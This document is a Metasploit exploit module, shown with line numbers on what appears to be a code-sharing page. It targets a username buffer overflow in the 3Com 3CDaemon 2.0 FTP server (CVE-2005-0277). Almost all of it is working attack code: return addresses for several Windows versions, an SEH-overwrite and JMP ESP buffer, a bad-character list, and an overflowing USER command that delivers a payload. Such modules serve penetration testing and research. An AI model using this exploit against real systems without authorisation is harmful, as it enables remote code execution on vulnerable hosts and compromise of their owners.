Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::Ftp
10
  include Msf::Exploit::Remote::Seh
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => '3Com 3CDaemon 2.0 FTP Username Overflow',
15
      'Description'    => %q{
16
          This module exploits a vulnerability in the 3Com 3CDaemon
17
        FTP service. This package is being distributed from the 3Com
18
        web site and is recommended in numerous support documents.
19
        This module uses the USER command to trigger the overflow.
20
      },
21
      'Author'         =>
22
        [
23
          'hdm',       # Original author
24
          'otr'        # Windows XP SP3
25
        ],
26
      'License'        => MSF_LICENSE,
27
      'References'     =>
28
        [
29
          [ 'CVE', '2005-0277'],
30
          [ 'OSVDB', '12810'],
31
          [ 'OSVDB', '12811'],
32
          [ 'BID', '12155']
33
        ],
34
      'DefaultOptions' =>
35
        {
36
          'EXITFUNC' => 'seh',
37
          'target' => 0
38
        },
39
      'Privileged'     => false,
40
      'Payload'        =>
41
        {
42
          'Space'    => 674,
43
          'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x09",
44
          'StackAdjustment' => -3500,
45
          'Compat'   =>
46
            {
47
              'ConnectionType' => "-find"
48
            }
49
        },
50
      'Platform'       => %w{ win },
51
      'Targets'        =>
52
        [
53
          [
54
            'Windows 2000 English', # Tested OK - hdm 11/24/2005
55
            {
56
              'Platform' => 'win',
57
              'Ret'      => 0x75022ac4, # ws2help.dll
58
              'Offset'   => 229,
59
            },
60
          ],
61
          [
62
            'Windows XP English SP0/SP1',
63
            {
64
              'Platform' => 'win',
65
              'Ret'      => 0x71aa32ad, # ws2help.dll
66
              'Offset'   => 229,
67
            },
68
          ],
69
          [
70
            'Windows NT 4.0 SP4/SP5/SP6',
71
            {
72
              'Platform' => 'win',
73
              'Ret'      => 0x77681799, # ws2help.dll
74
              'Offset'   => 229,
75
            },
76
          ],
77
          [
78
            'Windows 2000 Pro SP4 French',
79
            {
80
              'Platform' => 'win',
81
              'Ret' => 0x775F29D0,
82
              'Offset'   => 229,
83
            },
84
          ],
85
          [
86
            'Windows XP English SP3',
87
            {
88
              'Platform' => 'win',
89
              'Ret'      => 0x7CBD41FB,   # 7CBD41FB JMP ESP shell32.data SP3
90
              #'Ret'      => 0x775C2C1F,   # 775C2C1F JMP ESP shell32.data SP1
91
              'Offset'   => 245,
92
            },
93
          ],
94
        ],
95
      'DisclosureDate' => '2005-01-04'))
96
  end
97

98
  def check
99
    connect
100
    disconnect
101
    if (banner =~ /3Com 3CDaemon FTP Server Version 2\.0/)
102
      return Exploit::CheckCode::Appears
103
    end
104
    return Exploit::CheckCode::Safe
105
  end
106

107
  def exploit
108
    connect
109

110
    print_status("Trying target #{target.name}...")
111

112
    if (target == targets[4])
113
      buf = rand_text_english(target['Offset'], payload_badchars)
114
      buf << [ target['Ret'] ].pack('V') * 2
115
      buf << payload.encoded
116
    else
117
      buf = rand_text_english(2048, payload_badchars)
118
      seh = generate_seh_payload(target.ret)
119
      buf[target['Offset'], seh.length] = seh
120
    end
121

122
    send_cmd( ['USER', buf] , false )
123

124
    handler
125
    disconnect
126
  end
127
end
128

129